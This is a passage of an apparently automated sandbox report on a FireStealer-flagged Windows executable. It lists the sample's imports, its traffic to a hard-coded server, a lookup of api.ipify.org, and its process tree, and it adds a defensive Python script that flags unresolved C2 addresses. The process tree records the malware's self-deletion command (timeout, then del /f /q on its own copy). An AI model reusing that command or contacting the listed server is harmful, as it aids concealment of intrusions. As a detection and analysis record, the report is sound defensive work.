GetClientRect, IsIconic, GetSystemMenu, SendMessageA, AppendMenuA, CopyAcceleratorTableA, SetRect, IsRectEmpty, DrawIcon, LoadCursorA, GetDlgItem, GetSysColorBrush, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, DestroyMenu, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, SetFocus, IsChild, GetWindowTextLengthA, CreateDialogIndirectParamA, GetWindowTextA, GetMessageTime
GDI32.dll | SetMapMode, DeleteObject, GetViewportExtEx, GetWindowExtEx, PtVisible, RectVisible, TextOutA, Escape, SelectObject, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, ExtSelectClipRgn, DeleteDC, GetStockObject, GetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetDeviceCaps
comdlg32.dll | GetFileTitleA
WINSPOOL.DRV | ClosePrinter, DocumentPropertiesA, OpenPrinterA
ADVAPI32.dll | RegEnumKeyA, RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegCloseKey, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA
COMCTL32.dll |
SHLWAPI.dll | PathFindExtensionA, PathFindFileNameA, PathStripToRootA, PathIsUNCA
oledlg.dll |
ole32.dll | CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoTaskMemAlloc, OleInitialize, OleUninitialize, CoTaskMemFree, CoCreateInstance, CoSetProxyBlanket, CoInitialize, CoUninitialize, CoRevokeClassObject, OleIsCurrentClipboard, OleFlushClipboard, CoFreeUnusedLibraries, CoRegisterMessageFilter
OLEAUT32.dll | VariantInit, SysAllocStringLen, VariantClear, VariantChangeType, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, VariantCopy, SysAllocString, SysFreeString
iphlpapi.dll | GetAdaptersInfo
OLEACC.dll | LresultFromObject, CreateStdAccessibleObject
Language of compilation system | Country where language is spoken
Chinese | China
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/05/24-00:24:50.450010 | TCP | 2051909 | ET TROJAN Win32/FireStealer Related Server Response | 80 | 49789 | 144.208.127.230 | 192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.746968031 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.784807920 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.784807920 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.889528036 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.913850069 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.955168009 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.960611105 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.960611105 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.064706087 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.089246988 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.138124943 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.138124943 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.242675066 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.273591042 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.314446926 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.344860077 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.344860077 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.449444056 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.474955082 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.517565966 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.581295013 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.581295013 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.685782909 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.720448017 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.754550934 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.754550934 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.859148026 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.886817932 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.939325094 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.993621111 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.993621111 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.098404884 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.130491972 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.173640966 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.209886074 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.209886074 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.314246893 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.350059032 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.392358065 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.440471888 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.440471888 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.545001030 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.572115898 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.626641989 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.687793016 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.687793016 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.792337894 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.820131063 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.861021996 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.944320917 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.944320917 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:53.049401999 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:53.075536013 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:53.126554966 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:53.186395884 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:53.186395884 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:53.291074038 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:53.317679882 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:53.360930920 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:53.392790079 CEST4978980192.168.11.20144.208.127.230
UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 5, 2024 00:24:47.800074100 CEST | 54765 | 53 | 192.168.11.20 | 1.1.1.1
May 5, 2024 00:24:47.899873972 CEST | 53 | 54765 | 1.1.1.1 | 192.168.11.20

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 5, 2024 00:24:47.800074100 CEST | 192.168.11.20 | 1.1.1.1 | 0x3613 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 5, 2024 00:24:47.899873972 CEST | 1.1.1.1 | 192.168.11.20 | 0x3613 | No error (0) | api.ipify.org | (none) | 172.67.74.152 | A (IP address) | IN (0x0001) | false
May 5, 2024 00:24:47.899873972 CEST | 1.1.1.1 | 192.168.11.20 | 0x3613 | No error (0) | api.ipify.org | (none) | 104.26.13.205 | A (IP address) | IN (0x0001) | false
May 5, 2024 00:24:47.899873972 CEST | 1.1.1.1 | 192.168.11.20 | 0x3613 | No error (0) | api.ipify.org | (none) | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                                                                                                                          • api.ipify.org
                                                                                                                                          • 144.208.127.230
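The tables above record two network facts worth checking mechanically: the only DNS lookup is for api.ipify.org (a public-IP echo service), and the HTTP session on port 80 goes to 144.208.127.230, an address that no DNS answer in the capture ever returned, so it is hard-coded in the sample. The script below is an added example (not part of the Joe Sandbox report) that parses pipe-separated rows transcribed from the packet and DNS tables, summarises the TCP flow per direction with its duration and median inter-packet gap, lists server IPs that were never resolved by DNS, and flags lookups of IP-echo services. The sample rows are a constructed subset of the table; the IP-echo watch-list is an assumed list, not something the report states.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample input: a subset of rows transcribed from the packet table
# above, in the form  timestamp | src port | dst port | src IP | dst IP.
TCP_ROWS = """\
May 5, 2024 00:24:50.215768099 CEST | 80 | 49789 | 144.208.127.230 | 192.168.11.20
May 5, 2024 00:24:50.216002941 CEST | 49789 | 80 | 192.168.11.20 | 144.208.127.230
May 5, 2024 00:24:50.216104031 CEST | 49789 | 80 | 192.168.11.20 | 144.208.127.230
May 5, 2024 00:24:50.216152906 CEST | 49789 | 80 | 192.168.11.20 | 144.208.127.230
May 5, 2024 00:24:50.320934057 CEST | 80 | 49789 | 144.208.127.230 | 192.168.11.20
May 5, 2024 00:24:50.320976019 CEST | 80 | 49789 | 144.208.127.230 | 192.168.11.20
May 5, 2024 00:24:50.450010061 CEST | 80 | 49789 | 144.208.127.230 | 192.168.11.20
May 5, 2024 00:24:50.450428009 CEST | 49789 | 80 | 192.168.11.20 | 144.208.127.230
"""

# Query names and resolver answers transcribed from the DNS tables above.
DNS_QUERIES = ["api.ipify.org"]
DNS_ANSWERS = {"api.ipify.org": {"172.67.74.152", "104.26.13.205", "104.26.12.205"}}

# Assumed watch-list of public-IP echo services that stealers query to learn
# the victim's external address; extend as needed.
IP_ECHO_SERVICES = {"api.ipify.org", "icanhazip.com", "ipinfo.io",
                    "checkip.amazonaws.com", "api.myip.com"}

TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) \w+$")


def parse_ts(text):
    """Parse 'May 5, 2024 00:24:50.215768099 CEST'. The zone name is dropped and
    the fraction truncated to microseconds, the resolution datetime can hold."""
    m = TS_RE.match(text.strip())
    if not m:
        raise ValueError(f"bad timestamp: {text!r}")
    base, frac = m.groups()
    micros = int(frac[:6].ljust(6, "0"))
    return datetime.strptime(base, "%b %d, %Y %H:%M:%S").replace(microsecond=micros)


def parse_packets(text):
    pkts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, sip, dip = [f.strip() for f in line.split("|")]
        pkts.append({"ts": parse_ts(ts), "sport": int(sport), "dport": int(dport),
                     "sip": sip, "dip": dip})
    return pkts


def flow_key(p):
    """Direction-independent key (client, client port, server, server port);
    the endpoint with the lower port number is taken as the server."""
    if p["dport"] <= p["sport"]:
        return (p["sip"], p["sport"], p["dip"], p["dport"])
    return (p["dip"], p["dport"], p["sip"], p["sport"])


def summarize_flows(pkts):
    flows = defaultdict(list)
    for p in pkts:
        flows[flow_key(p)].append(p)
    out = {}
    for key, ps in flows.items():
        ps.sort(key=lambda p: p["ts"])
        client = key[0]
        gaps_ms = [(b["ts"] - a["ts"]).total_seconds() * 1000 for a, b in zip(ps, ps[1:])]
        out[key] = {
            "client_to_server": sum(1 for p in ps if p["sip"] == client),
            "server_to_client": sum(1 for p in ps if p["sip"] != client),
            "duration_s": (ps[-1]["ts"] - ps[0]["ts"]).total_seconds(),
            "median_gap_ms": median(gaps_ms) if gaps_ms else 0.0,
        }
    return out


def unresolved_destinations(pkts, dns_answers, local_prefix="192.168."):
    """External server IPs that no DNS answer in the capture returned, i.e.
    addresses the sample carries hard-coded instead of resolving a name."""
    resolved = set().union(*dns_answers.values())
    servers = {flow_key(p)[2] for p in pkts}
    return {ip for ip in servers if not ip.startswith(local_prefix) and ip not in resolved}


def ip_echo_lookups(dns_queries):
    return sorted(q for q in dns_queries if q.lower() in IP_ECHO_SERVICES)


if __name__ == "__main__":
    packets = parse_packets(TCP_ROWS)
    for key, stats in summarize_flows(packets).items():
        print(key, stats)
    print("hard-coded destinations:", unresolved_destinations(packets, DNS_ANSWERS))
    print("IP-echo lookups:", ip_echo_lookups(DNS_QUERIES))
```

The "never resolved" check is the one to carry into production telemetry: correlate each outbound connection from a process with the DNS answers that process received shortly before, and treat a direct-to-IP connection to a plaintext port, preceded only by an IP-echo lookup, as a strong C2 indicator.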


Target ID: 0
Start time: 00:23:27
Start date: 05/05/2024
Path: C:\Users\user\Desktop\app.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\app.exe"
Imagebase: 0x400000
File size: 1'290'240 bytes
MD5 hash: 75B9EF9142A78671D449C8D22AB6BE14
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 00:23:27
Start date: 05/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7cb400000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 00:24:07
Start date: 05/05/2024
Path: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
Imagebase: 0x400000
File size: 1'290'240 bytes
MD5 hash: 75B9EF9142A78671D449C8D22AB6BE14
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 11%, ReversingLabs
• Detection: 11%, Virustotal
Reputation: low
Has exited: true

Target ID: 4
Start time: 00:24:07
Start date: 05/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7cb400000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 00:25:08
Start date: 05/05/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Imagebase: 0x90000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 00:25:08
Start date: 05/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7cb400000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 00:25:08
Start date: 05/05/2024
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout /t 5
Imagebase: 0xd40000
File size: 25'088 bytes
MD5 hash: 976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                          No disassembly